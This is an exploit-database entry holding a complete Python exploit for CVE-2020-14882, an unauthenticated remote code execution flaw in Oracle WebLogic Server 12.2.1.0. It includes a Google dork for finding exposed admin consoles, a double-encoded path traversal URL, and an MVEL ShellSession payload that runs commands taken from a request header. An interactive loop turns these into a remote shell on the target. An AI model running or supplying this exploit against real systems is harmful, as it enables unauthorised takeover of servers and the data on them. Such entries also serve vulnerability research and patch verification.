Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)

EDB-ID:

49479




Platform:

Java

Date:

2021-01-26


# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)
# Google Dork: inurl:"/console/login/LoginForm.jsp"
# Date: 01/26/2021
# Exploit Author: CHackA0101
# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html
# Version: Oracle WebLogic Server, version 12.2.1.0
# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux)
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html
# CVE : CVE-2020-14882

# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md

#!/usr/bin/python3

import requests
import argparse
import http.client
http.client.HTTPConnection._http_vsn=10
http.client.HTTPConnection._http_vsn_str='HTTP/1.0'
parse=argparse.ArgumentParser()
parse.add_argument('-u','--url',help='url')
args=parse.parse_args()

proxies={'http':'127.0.0.1:8080'}
cmd_=""

# Headers
headers = {
	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15;rv:73.0)Gecko/20100101 Firefox/73.0",
	"Accept":"application/json,text/plain,*/*",
	"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
	"Accept-Encoding":"gzip,deflate",
	"Upgrade-Insecure-Requests":"1",
	"Content-Type":"application/x-www-form-urlencoded",
	"Cache-Control":"max-age=0",
	"Connection":"close"
}

# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation:
url=args.url+"""/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec();");"""
url_=args.url+"/console/images/%252E%252E%252Fconsole.portal"

form_data_="""_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread=(weblogic.work.ExecuteThread)Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe","/c", cmd} : new String[]{"/bin/sh","-c", cmd};
if (cmd != null) {
    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\\A").next();
    weblogic.servlet.internal.ServletResponseImpl res=(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);
    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
    res.getServletOutputStream().flush();
    res.getWriter().write("");}executeThread.interrupt();");"""

#data_ = parse.urlencode(form_data_)
results1=requests.get(url,headers=headers)

if results1.status_code==200:
	print("(Load Headers...)\n")
	print("(Data urlencode...)\n")
	print("(Execute exploit...)\n")
	print("(CHackA0101-GNU/Linux)$ Successful Exploitation.\n")
	while True:
		cmd_test = input("(CHackA0101GNU/Linux)$ ")
		if cmd_test=="exit":
			break
		else:
			try:
				cmd_ = cmd_test
				headers = {
					'cmd': cmd_,
					'Content-Type':'application/x-www-form-urlencoded',
					'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36',
					'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
					'Connection':'close',
					'Accept-Encoding':'gzip,deflate',
					'Content-Length':'1244',
					'Content-Type':'application/x-www-form-urlencoded'
				}
				results_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text
				print(results_)
			except:
				pass
else:
	print("(CHackA0101-GNU/Linux)$ Fail.\n")